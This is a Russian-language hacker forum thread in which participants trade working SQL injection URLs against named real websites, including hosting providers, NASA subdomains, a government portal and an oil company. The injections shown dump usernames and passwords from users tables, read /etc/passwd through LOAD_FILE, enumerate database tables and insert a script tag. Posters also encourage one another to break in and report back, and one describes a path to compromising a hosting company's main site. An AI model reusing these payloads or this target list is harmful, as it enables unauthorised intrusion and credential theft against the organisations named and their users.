SQL Инъекции

http://surnet.ru/show_txt.php?id=-99+union+select+1,2,3,4,5,6,char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,112,114,101,118,101,100,39,41,60,47,115,99,114,105,112,116,62),8/*

UTEL - Челябинск (Южно-Уральская сеть передачи данных)
На этом же сайте и статистика и т.д.

 

http://www.expressglobal.ru/directions/china/tours/?id=-1+union+select+null/*
Вот одна, правда толку от неё...

 

http://pride.uoregon.edu/section.php?id=-1+union+select+1,2,3,4,5,6/*
одна была

 

Лень самому возиться с взломом... Сам нашел все...

http://hoster.od.ua/hosting/hosting_faq.php?news_id=1+union+select+1,user()/*
http://www.all4hosting.ru/index.asp?idSort=3&idPage=1+union+select+1,2,3--
http://www.ht-systems.ru/events/news.php?ID=4+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6/*
http://aho.ru/hosting/tarifs.php?tgroup=2+union+select+1,2,3/*
http://uptime.ru/content.php?what=preleases&id=-1+union+select+1,login,password,4,5,6,7+from+users+limit+1,3/*
http://ivanhost.ru/?p=18&a=-3+union+select+USER(),DATABASE()/*
http://order.besthost.ru/order/index.php?hmid=-1+union+select+1,2,3,4,5,6,7,LOAD_FILE('/etc/passwd'),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

Все - хостинги, из двух последних - один из них - реселлер valuehost'а, а второй прямо в той же базе, что и valuehost, так что не мудрено взломать и сам valuehost.ru

 

http://fotokatalog.ru/index.php?pp=25+union+select+1/*&from=50

Incorrect usage of UNION and ORDER BY
ЧТо это?
P.S. 2 Macros http://hoster.od.ua/hosting/hosting_faq.php?news_id=1+union+select+concat(id,char(58),user,char(58),pass,char(58,32,32,32),rights,char(58),rname,char(58),mail,char(58),char(58),editor)%20,concat(char(83,101,115,115,105,111,110,58,32),sess)+from+login/*
Супер, а у меня вчера ничего не получилось...

 

Там данные из переменной pp подставляются в order by, а данные из переменной from - в limit. Так что ни хрена не получится. Он всегда тебе будет выдавать ошибку, видимо там

Code:

ORDER BY $pp LIMIT $from,25

 

Если кто-нибудь что-нибудь из этого взломает - отпишитесь пожалуйста, хоть в личку

 

Всех с 2007-мым годом и Скуль на allpeople.ru

http://www.allpeople.ru/chital.php?read=-2+union+select+1,2,3,4,concat(login,char(3),pas),DATABASE(),7,8,9,10+from+people+where+id=[Нужный вам id]/*

 

http://hoster.od.ua
http://uptime.ru
http://www.ht-systems.ru
- баян =\
Давно хекал =\
"Если кто-нибудь что-нибудь из этого взломает - отпишитесь пожалуйста, хоть в личку " - для чего?

 

http://www.belize.gov.bz/doc_center_directory_listings.php?folder_id=-99+union+select+1,2,concat(username,0x3a,password),4+from+users+limit+0,1/*

 

Nasa.gov

http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-99+union+select+1,2,3,4,5,6,7,8,table_name,10,11,12+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

http://ase.arc.nasa.gov/tech/groups/index.php?ta=4&gid=-99'+union+select+1,table_name,3,4,convert('asd'%20using%20utf8),6,7,8,9+from+INFORMATION_SCHEMA.TABLES/*

Дальше юзать не стал, некогда =\

 

_http://www.magverlag.com/offshore_news/news.php?page=0&news=-1+UNION+SELECT+null,null,concat(email,char(58),ip),null,null,null,null,null,null+from+emails/*

 

http://www.rabota.su/voting/stat.php?id=-99+union+select+1,concat(login,0x3a,pwd),3+from+users+limit+0,1/*
gl

 

Так тут всё серьёзно Вот, с утра нашёл:
MySQL 4.0.18:

Code:

http://news.numizmatik.ru/read.php?news=-2566+union+select+1,2,3,4,5,6,7,8/*

-----
MySQL 4.0.27:

Code:

http://www.jerusalemsummit.org/eng/news.php?news=-102+union+select+1,2,3,4,5,6,7,8,9,10/*

-----
MySQL 4.1.20:

Code:

http://whtt.org/index.php?news=2&id=-1103+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

-----
MySQL 4.0.21:

Code:

http://expodessa.od.ua/conference/site.php/news?id=-1+union+select+1,2,3/*

-----
MySQL 4.1.21:

Code:

http://www.falungonginfo.net/display.php?news=-1+union+select+1,2,3,4,5,6/*

-----
MySQL ------

Code:

http://www.simpleinvoices.org/index.php?news=-1+union+select+1,2,3,4,5/*

-----

 

Сегодня делать определённо нечего
MySQL 4.0.20a:

Code:

http://www.apahelpcenter.org/featuredtopics/feature.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

-----
MySQL 5.0.24a:

Code:

http://www.ipecac.com/bio.php?id=-1+union+select+1,2,3,4/*

-----
MySQL -------

Code:

http://www.keckobservatory.org/article.php?id=-87+union+select+1,2,3,4,5,6,7,8/*

-----

 

MySQL ------

Code:

http://www.virtualworldlets.net/Archive/IndividualNews.php?News=-1047+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

-----
MySQL 4.0.25:

Code:

http://www.fitness.ru/clubs/timetable.phtml?ClubID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

-----

 

http://www.liteforex.net/index.php?page=tools.php&cat=-99+union+select+1,username,3,4,5,6,7,8,9+from+phpbb_users/*
и т.д.
+там в параметре 'page' вроде бы инклуд .) - но я не стал заморачиваться

 

http://www.allse.ru/profile.php?lookup=-1+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*
P.S.: смотреть title .)

 

http://www.impactsoft.ru/clients.php?razdel_id=1+union+select+1,AES_DECRYPT(%20AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9/*

 

http://www.slavneft.ru/press/info.php?id=-999+union+select+1,2,3,4,5,6,7,8,9/*
ОАО "НГК "Славнефть""